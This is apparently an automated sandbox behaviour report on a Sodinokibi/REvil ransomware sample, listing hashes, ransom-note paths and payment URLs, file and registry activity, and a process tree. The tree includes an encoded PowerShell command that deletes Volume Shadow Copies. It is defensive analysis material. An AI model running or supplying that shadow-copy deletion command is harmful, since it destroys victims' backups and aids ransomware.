Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231025-en -
resource tags
arch:x64arch:x86image:win10v2004-20231025-enlocale:en-usos:windows10-2004-x64system -
submitted
17-11-2023 15:57
Behavioral task
behavioral1
Sample
NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe
Resource
win10v2004-20231025-en
General
-
Target
NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe
-
Size
164KB
-
MD5
17d54fde8f0dca439f4c32a02598e382
-
SHA1
5eb54861db41b62e9fa296f703f06b8e52d1941d
-
SHA256
5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c
-
SHA512
09473f8ad9cd0d614d4a6fed4f7c34bba89f4a3e8cd0a350870e716b1f499d0d99f25ea436b13512094bf2f56178d5f9ffa8c74ad125c4c61e6aaba7b2a814b5
-
SSDEEP
3072:ffYWjswg4fQlt4ndm8jX5IXzs+M9VQHDOVFI0kmit3:ffYWAw9fcUdmwIXo+M9VQHDlZmit
Malware Config
Extracted
C:\Recovery\lksa5g4hnb-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C02D5C9E3F2A6806
http://decryptor.top/C02D5C9E3F2A6806
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exedescription ioc process File opened (read-only) \??\Y: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\V: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\Q: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\D: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\P: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\I: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\N: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\R: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\X: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\Z: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\E: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\L: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\W: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\K: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\G: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\U: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\F: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\A: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\J: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\M: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\O: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\S: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\T: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\B: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened (read-only) \??\H: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7b35.bmp" NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe -
Drops file in Program Files directory 13 IoCs
Processes:
NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exedescription ioc process File opened for modification \??\c:\program files\ExportConnect.potx NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened for modification \??\c:\program files\LimitEnter.xml NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened for modification \??\c:\program files\RemoveFormat.mpeg NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened for modification \??\c:\program files\GetCompare.mp4 NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened for modification \??\c:\program files\TraceSwitch.xsl NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened for modification \??\c:\program files\UnregisterCompress.vb NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened for modification \??\c:\program files\InvokeAdd.mp4v NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File created \??\c:\program files\lksa5g4hnb-readme.txt NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File created \??\c:\program files (x86)\lksa5g4hnb-readme.txt NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened for modification \??\c:\program files\ConvertFromAssert.vbs NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened for modification \??\c:\program files\ExpandRedo.i64 NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened for modification \??\c:\program files\HideSwitch.potm NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe File opened for modification \??\c:\program files\RegisterSave.xsl NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exepowershell.exepid process 2888 NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe 2888 NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe 3720 powershell.exe 3720 powershell.exe 3720 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 3720 powershell.exe Token: SeBackupPrivilege 3748 vssvc.exe Token: SeRestorePrivilege 3748 vssvc.exe Token: SeAuditPrivilege 3748 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exedescription pid process target process PID 2888 wrote to memory of 3720 2888 NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe powershell.exe PID 2888 wrote to memory of 3720 2888 NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe powershell.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe"C:\Users\Admin\AppData\Local\Temp\NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe"1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Recovery\lksa5g4hnb-readme.txtFilesize
6KB
MD57d737a22118f9a6fb0dbe83b7b497b10
SHA1b4d807d1b957dcb64fe3eb1b89bec62443298277
SHA256a09eeb7cd7b5cd5bb9efcc2c5291065b8d84c450d78a703323fa05debfb8d9ec
SHA5127b49b0aceeec969d88eb71e3656ad69d895c8ce9639a0a5828ee54a8871ef42f1a6048fca8aa4d2e1e9965a54083fa9166bd8b3109fd48e70c5110d7cce9acb9
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wsdj2in5.231.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/3720-5-0x0000022B1F8E0000-0x0000022B1F902000-memory.dmpFilesize
136KB
-
memory/3720-10-0x00007FFEFBD60000-0x00007FFEFC821000-memory.dmpFilesize
10.8MB
-
memory/3720-11-0x0000022B37AD0000-0x0000022B37AE0000-memory.dmpFilesize
64KB
-
memory/3720-12-0x0000022B37AD0000-0x0000022B37AE0000-memory.dmpFilesize
64KB
-
memory/3720-15-0x00007FFEFBD60000-0x00007FFEFC821000-memory.dmpFilesize
10.8MB